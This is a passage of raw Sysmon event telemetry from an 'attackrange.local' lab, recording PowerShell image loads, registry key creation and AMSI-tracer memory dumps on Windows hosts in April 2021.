Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001060996Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:08.079{761B69BB-6120-6080-945C-00000000BA01}4324C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{761B69BB-818A-607D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{761B69BB-8200-607D-A100-00000000BA01}4148C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001060995Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:08.041{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001060994Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:08.041{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001530327Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.754{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\amsi_tracer\-176461827_powershell.exe_388_5368_11.dmp2021-04-21 17:30:08.754 11241100x80000000000000001530326Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.754{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\amsi_tracer\-176461836_powershell.exe_388_5368_10.dmp2021-04-21 17:30:08.754 11241100x80000000000000001530325Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.747{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\amsi_tracer\-176461845_powershell.exe_388_5368_9.dmp2021-04-21 17:30:08.747 11241100x80000000000000001530324Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.732{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\amsi_tracer\-176461860_powershell.exe_388_5368_8.dmp2021-04-21 17:30:08.732 11241100x80000000000000001530323Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.732{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\amsi_tracer\-176461860_powershell.exe_388_5368_7.dmp2021-04-21 17:30:08.732 11241100x80000000000000001530322Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.716{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\amsi_tracer\-176461863_powershell.exe_388_5368_6.dmp2021-04-21 17:30:08.716 11241100x80000000000000001530321Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.716{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\amsi_tracer\-176461871_powershell.exe_388_5368_5.dmp2021-04-21 17:30:08.716 11241100x80000000000000001530320Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.700{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\amsi_tracer\-176461890_powershell.exe_388_5368_4.dmp2021-04-21 17:30:08.700 734700x80000000000000001530319Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.685{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\diasymreader.dll14.8.3761.0 built by: NET48REL1Dia based SymReaderMicrosoft® .NET FrameworkMicrosoft Corporationdiasymreader.dllMD5=83673A2EC60EF42E8B88D3EE2763437C,SHA256=1F4A8B06F0DCB87F684EFE81FAB704C739C79B188A2C373D6B7ACB148AB4CFF6trueMicrosoft CorporationValid 12241200x80000000000000001530318Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.685{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\System\CurrentControlSet\Control\SecurityProviders\SCHANNEL 734700x80000000000000001530317Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.685{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\schannel.dll10.0.14393.4225 (rs1_release.210127-1811)TLS / SSL Security ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationschannel.dllMD5=2562B81E255EB6DF8497402ABC6C59BB,SHA256=340532C238CA5B84BA9D7A2DB4D1CCD58D869FECC44A463A93F54C974E1B41F4trueMicrosoft WindowsValid 734700x80000000000000001530316Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.669{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\FWPUCLNT.DLL10.0.14393.0 (rs1_release.160715-1616)FWP/IPsec User-Mode APIMicrosoft® Windows® Operating SystemMicrosoft Corporationfwpuclnt.dllMD5=A65FA613342B08E0F760D8B13B9C135A,SHA256=C64A1EC862188D2EE1202DB02BFBF4E2DD56780905E509012799EB57FC9A88EDtrueMicrosoft WindowsValid 12241200x80000000000000001530315Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.669{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x80000000000000001530314Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.669{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x80000000000000001530313Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.669{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 734700x80000000000000001530312Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.669{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\rasadhlp.dll10.0.14393.0 (rs1_release.160715-1616)Remote Access AutoDial HelperMicrosoft® Windows® Operating SystemMicrosoft Corporationrasadhlp.dllMD5=FAE8D0480BDD905EEA453D3A57C8D5C6,SHA256=C1531223B8201B344A6A6474CB2D9B8A8C632250A3A6F472EC5E2D7D28ADD94CtrueMicrosoft WindowsValid 12241200x80000000000000001530311Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.669{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x80000000000000001530310Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.669{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x80000000000000001530309Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.669{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 734700x80000000000000001530308Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.669{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\OnDemandConnRouteHelper.dll10.0.14393.4169 (rs1_release.210107-1130)On Demand Connctiond Route HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationOnDemandConnRouteHelper.dllMD5=BAE78E97BEBB832376654560305922E3,SHA256=6A188DC4F1005E46CCA529E9C757D9B3B5F98E5587AFAA5E4200C7DD2AC73355trueMicrosoft WindowsValid 734700x80000000000000001530307Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.669{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\winhttp.dll10.0.14393.4169 (rs1_release.210107-1130)Windows HTTP ServicesMicrosoft® Windows® Operating SystemMicrosoft Corporationwinhttp.dllMD5=24995B62FFC2519B34A2145673BD275F,SHA256=BB7D4DE1BE6111462F65F999A8969DA04113F15A80D534A93D3CCC76A9FE1F22trueMicrosoft WindowsValid 734700x80000000000000001530306Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.669{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\mswsock.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft Windows Sockets 2.0 Service ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationmswsock.dllMD5=B52ACA309FD6F72105951FFBA022327B,SHA256=02AB6CCE4BF0D3F075D5E982F5A4CBDB514CE7C245EA474D7846A86CD3F13202trueMicrosoft WindowsValid 12241200x80000000000000001530305Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.669{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\Tracing 734700x80000000000000001530304Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.669{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\rtutils.dll10.0.14393.3930 (rs1_release.200901-1914)Routing UtilitiesMicrosoft® Windows® Operating SystemMicrosoft CorporationRTUTILS.DLLMD5=7F8BC94C915BD52D3422C5AD11389CEF,SHA256=68012DC490FEB77A313007FB1C3EC3F158A5C339AE620DC869B192EDAAED545BtrueMicrosoft WindowsValid 734700x80000000000000001530303Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.669{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\rasman.dll10.0.14393.0 (rs1_release.160715-1616)Remote Access Connection ManagerMicrosoft® Windows® Operating SystemMicrosoft CorporationRasman.dllMD5=B07D32F44DFADC6EB9BBAFA1783B8468,SHA256=C412A22F84E06BA8B13BC53BBA263F066C0152261198FA74D6C3D7D18BB470E9trueMicrosoft WindowsValid 734700x80000000000000001530302Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.669{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\rasapi32.dll10.0.14393.4283 (rs1_release.210303-1802)Remote Access APIMicrosoft® Windows® Operating SystemMicrosoft Corporationrasapi32.dllMD5=4AD563CA721F138B52B98887B7A6F484,SHA256=054C99FD96437F0C40F8B9A6342DC80006D3509D024A9591BEBA0DD314C9FCB5trueMicrosoft WindowsValid 12241200x80000000000000001530301Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.653{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x80000000000000001530300Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.653{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x80000000000000001530299Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.653{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x80000000000000001530298Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.653{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x80000000000000001530297Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.653{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 734700x80000000000000001530296Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.653{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\winnsi.dll10.0.14393.2339 (rs1_release_inmarket.180611-1502)Network Store Information RPC interfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationwinnsi.dllMD5=25B3BD4D63460EE4599F5631C1B83D21,SHA256=07E055D47940F09CB7EB512D52672C944D7D2F035A2F45766319871C0862C5B1trueMicrosoft WindowsValid 734700x80000000000000001530295Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.653{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\dhcpcsvc.dll10.0.14393.3930 (rs1_release.200901-1914)DHCP Client ServiceMicrosoft® Windows® Operating SystemMicrosoft Corporationdhcpcsvc.dllMD5=CD3B9633BBEF2102C4665A2C39EC0B1A,SHA256=341EFB4806BE39E09AA90CA3B069C39F2A9D61FA9B512350B2721D41875AFCAEtrueMicrosoft WindowsValid 734700x80000000000000001530294Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.653{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\dhcpcsvc6.dll10.0.14393.3930 (rs1_release.200901-1914)DHCPv6 ClientMicrosoft® Windows® Operating SystemMicrosoft Corporationdhcpcsvc6.dllMD5=1721EAC44BCFC7177AA664ADCA514F23,SHA256=C099BCCE44A04A48147DE8CF093EBF997510154113789BF31394B5148F60B375trueMicrosoft WindowsValid 12241200x80000000000000001530293Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.653{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x80000000000000001530292Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.653{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 734700x80000000000000001530291Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.653{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\nsi.dll10.0.14393.3297 (rs1_release_1.191001-1045)NSI User-mode interface DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationnsi.dllMD5=994E2A6D2A0B38E0968B3998E42033AC,SHA256=491F2D1DE09C39B324BCF5800198AC7CCE755F4023F1FEB3854D33716461BC27trueMicrosoft WindowsValid 734700x80000000000000001530290Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.653{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\dnsapi.dll10.0.14393.4350 (rs1_release.210407-2154)DNS Client API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationdnsapiMD5=D7651F99299B13D576A72643BFC44944,SHA256=589302E630C473DBDF4CE92C59F00B029FCA0C228E7111A764166E16025FA1A9trueMicrosoft WindowsValid 734700x80000000000000001530289Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.653{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\IPHLPAPI.DLL10.0.14393.2339 (rs1_release_inmarket.180611-1502)IP Helper APIMicrosoft® Windows® Operating SystemMicrosoft Corporationiphlpapi.dllMD5=3CD38EDF9CA12F91131EDEE32D1C9DF5,SHA256=AF2440640BF8BDEAAF0DECDD7C354158E415ED0AA340ABA7A6CCCDC09C1E728BtrueMicrosoft WindowsValid 11241100x80000000000000001530288Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:08.651{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\amsi_tracer\-176461942_powershell.exe_388_5368_3.dmp2021-04-21 17:30:08.650 12241200x80000000000000001530287Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.650{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CTLs 12241200x80000000000000001530286Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.650{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CRLs 12241200x80000000000000001530285Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.650{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\Certificates 12241200x80000000000000001530284Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.650{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x80000000000000001530283Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.650{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x80000000000000001530282Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.650{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x80000000000000001530281Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.650{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x80000000000000001530280Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.650{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x80000000000000001530279Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.650{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x80000000000000001530278Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.650{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x80000000000000001530277Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.650{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x80000000000000001530276Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.650{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x80000000000000001530275Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.650{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x80000000000000001530274Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.650{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x80000000000000001530273Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.650{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x80000000000000001530272Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.650{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x80000000000000001530271Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.650{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x80000000000000001530270Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.650{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x80000000000000001530269Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.650{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x80000000000000001530268Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.650{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x80000000000000001530267Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.650{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x80000000000000001530266Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.650{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x80000000000000001530265Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.649{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x80000000000000001530264Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.647{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x80000000000000001530263Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.631{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CTLs 12241200x80000000000000001530262Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.631{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CRLs 12241200x80000000000000001530261Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.631{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\Certificates 12241200x80000000000000001530260Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:08.631{21761711-6120-6080-BB5D-00000000BB01}388C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x80000000000000001530259Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 